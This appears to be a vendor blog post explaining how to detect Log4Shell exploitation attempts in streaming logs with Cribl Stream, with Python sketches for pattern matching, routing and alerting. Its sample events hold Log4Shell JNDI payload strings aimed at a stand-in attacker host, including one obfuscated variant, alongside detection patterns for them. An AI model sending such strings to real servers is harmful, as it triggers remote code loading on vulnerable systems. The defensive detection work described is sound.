The recent Apache Log4j vulnerability CVE-2021-44228, dubbed Log4Shell, is a big deal. By now there is no shortage of blogs, write-ups, and analyses explaining why this vulnerability is an urgent issue and why there is a very good chance it applies to your environment.

The Traditional Approach to Find Vulnerabilities

If you know how this vulnerability may be used to compromise your environment, you are all set – just patch all your systems that use Log4j. Easy, right? Not so fast. You may not have 100% accurate information about your network assets and, considering how widely used Log4j is, there is a good chance that there are systems that you may not know about or could not patch or reconfigure immediately.

You can rely on the vendors whose security solutions you use to update their detection rules, but it can be difficult to ensure that those tools front all your assets that may have Log4j running.

If you send most of your logs to a log aggregation tool like Splunk or Elasticsearch, or save them in a data lake, you may have artifacts containing the telltale pattern: specifically, a user agent string that starts with “${jndi:”, which can indicate attempts to exploit your systems. The challenge here is that you need to either know which data sources to review for the pattern or, alternatively, search all your data. Those searches can be very expensive (i.e., they consume a lot of resources and/or take a very long time), and they need to be performed either in real time or quite frequently. Your log aggregation environment may not be designed or sized to do that. Also, organizations like yours commonly have multiple log repositories and security analytics tools.

So, basically, you have many different places to look for patterns, and massive volumes of data to sift through. And you need to search all the data in real time or frequently.
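To make the search described above concrete, here is a minimal Python sketch of scanning log lines for the “${jndi:” prefix. The sample log lines and the function name are made up for illustration, and the case-insensitive match is an assumption. The sketch does not attempt to catch obfuscated variants of the string.

```python
import re

# Literal "${jndi:" prefix, matched case-insensitively (an assumption of this
# sketch). Obfuscated variants are NOT covered here.
JNDI_PATTERN = re.compile(r"\$\{jndi:", re.IGNORECASE)


def find_suspicious_lines(lines):
    """Return (line_number, line) pairs for lines containing the pattern."""
    return [
        (number, line)
        for number, line in enumerate(lines, start=1)
        if JNDI_PATTERN.search(line)
    ]


# Hypothetical access-log lines; the last quoted field is the user agent.
sample_log = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
]

for number, line in find_suspicious_lines(sample_log):
    print(f"line {number}: {line}")
```

Running a scan like this over every repository, and repeating it frequently, is exactly the part that gets expensive at scale.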

A Better Approach: Stream

If only you could route all your logs from the sources producing events and logs to multiple destinations via a secure observability pipeline, and search for the patterns in question as the data flies through the pipeline.

Cribl Stream is that pipeline, allowing you to route data from all kinds of sources (web servers, firewalls, endpoints, application logs, etc.) to log aggregation tools, data lakes, and security analytics tools. While Stream routes the data, it can also reduce, redact, shape, and replay that data, and search for the patterns associated with the vulnerability being exploited.

How Does It Work?



All of the events Stream receives are evaluated against filters that determine which Routes the events should go to. Each Route has a destination for the data that Stream processes. Processing is done by Pipelines, which consist of one or more functions.

This diagram depicts the logic described above:


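The same logic can be sketched as a small Python model. This is not Stream's implementation or configuration format, only an illustration of filters, Routes, Pipelines, and destinations. All names here (`Route`, `process`, `add_index`, the field names, and the destination labels) are hypothetical, and the sketch assumes that the first Route whose filter matches handles the event.

```python
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Tuple

Event = Dict[str, str]
# A pipeline function returns the (possibly modified) event, or None to drop it.
PipelineFunction = Callable[[Event], Optional[Event]]


@dataclass
class Route:
    name: str
    event_filter: Callable[[Event], bool]  # decides whether the Route applies
    pipeline: List[PipelineFunction]       # functions applied in order
    destination: str                       # where processed events are sent


def process(event: Event, routes: List[Route]) -> Optional[Tuple[str, Event]]:
    """Send the event down the first Route whose filter matches (assumption)."""
    for route in routes:
        if not route.event_filter(event):
            continue
        current: Optional[Event] = dict(event)  # work on a copy
        for function in route.pipeline:
            current = function(current)
            if current is None:  # a function dropped the event
                return None
        return route.destination, current
    return None  # no Route matched


def add_index(event: Event) -> Event:
    """Example function: add context to the event."""
    event["index"] = "web"
    return event


routes = [
    Route("web", lambda e: e.get("sourcetype") == "access_log", [add_index], "log_aggregator"),
    Route("default", lambda e: True, [], "data_lake"),
]

print(process({"sourcetype": "access_log", "_raw": "GET /"}, routes))
```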

Following this logic, we can create a filter that matches the common pattern used in the user agent string during an attempt to exploit the vulnerability. In the example below, the pattern is used in the Drop function in a Pipeline, so that every event without the pattern is dropped. The Pipeline will only keep the events with the pattern in question.


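In plain Python, the idea behind that Pipeline looks roughly like the sketch below. It is not the filter expression from the screenshot. The `user_agent` field name and the function names are assumptions made for illustration.

```python
import re

JNDI_PATTERN = re.compile(r"\$\{jndi:", re.IGNORECASE)


def drop_filter(event):
    """Return True when the event should be dropped, i.e. it lacks the pattern."""
    # "user_agent" is a hypothetical field name; use whatever your events carry.
    return JNDI_PATTERN.search(event.get("user_agent", "")) is None


def run_pipeline(events):
    """Apply the drop step and return only the surviving (suspicious) events."""
    return [event for event in events if not drop_filter(event)]


events = [
    {"src_ip": "10.0.0.5", "user_agent": "Mozilla/5.0"},
    {"src_ip": "10.0.0.9", "user_agent": "${jndi:ldap://attacker.example/a}"},
]

for event in run_pipeline(events):
    print(event)
```

Inverting the match inside the drop step is what turns a "drop" into a "keep only the suspicious events" Pipeline.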

What’s left to do is to decide whether you would like to add any context to the suspicious events (things like index name, new field, etc.), create a Route and attach the Pipeline to the Route.

You can use your current alerting mechanisms to trigger alerts when the pattern is discovered. In the Route, specify that alerting tool as the Output. In your environment, it can be tools like Slack receiving data via webhooks, log aggregation solutions that do alerting (e.g., Elastic, Splunk), or SOAR tools like XSOAR or Splunk SOAR.
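As a rough illustration of what an alert sent to a webhook might carry, the sketch below builds a JSON body with a single `text` field, the simple message shape that Slack incoming webhooks accept. The event field names and the message wording are hypothetical. Nothing is sent over the network here, since the destination itself would do the delivery.

```python
import json


def build_alert(event):
    """Build a JSON webhook body describing a suspicious event."""
    # "src_ip" and "user_agent" are hypothetical field names.
    source = event.get("src_ip", "unknown source")
    user_agent = event.get("user_agent", "")
    text = f"Possible Log4Shell attempt from {source}: {user_agent}"
    return json.dumps({"text": text})


suspicious = {"src_ip": "10.0.0.9", "user_agent": "${jndi:ldap://attacker.example/a}"}
print(build_alert(suspicious))
```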

Extra patterns can be added in the pipeline as more patterns are discovered. Those patterns can be neatly organized in a lookup or an external database where they can be updated automatically.
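A lookup-driven check could look something like this minimal Python sketch. The CSV layout, the column names, and the second pattern are illustrative assumptions, not a format Stream prescribes. In practice the lookup would come from a file or database rather than an inline string.

```python
import csv
import io

# Stand-in for a lookup file; rows can be added without touching the code.
LOOKUP_CSV = """pattern,description
${jndi:,JNDI lookup prefix
${${,nested lookup sometimes used for obfuscation
"""


def load_patterns(csv_text):
    """Read the 'pattern' column and normalize it to lowercase."""
    reader = csv.DictReader(io.StringIO(csv_text))
    return [row["pattern"].lower() for row in reader if row["pattern"]]


def matches_any(text, patterns):
    """Return True if any pattern occurs in the text (case-insensitive)."""
    lowered = text.lower()
    return any(pattern in lowered for pattern in patterns)


patterns = load_patterns(LOOKUP_CSV)
print(matches_any("${${lower:j}ndi:ldap://attacker.example/a}", patterns))
print(matches_any("Mozilla/5.0", patterns))
```

Keeping the patterns in data rather than in the filter itself means a new indicator is a one-row change.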

Final Thoughts on Log4j/Log4Shell

Attackers’ techniques are changing and will continue to change. With an observability pipeline routing the data, it is easy to quickly add patterns and other indicators of compromise (IOCs, which can also include known attacker IP addresses, payload hash signatures, etc.) and check them against massive data volumes coming from many data sources in real time.

Want to take Stream for a spin? Our live sandbox environment contains a full version of Stream running in the cloud, with ready-made sources and destinations.

And if you are wondering whether Stream is vulnerable to the CVE in question, the answer is no – Stream does not use Log4j or Java.

The fastest way to get started with Cribl Stream is to sign up at Cribl.Cloud. You can process up to 1 TB of throughput per day at no cost. Sign up and start using Stream within a few minutes.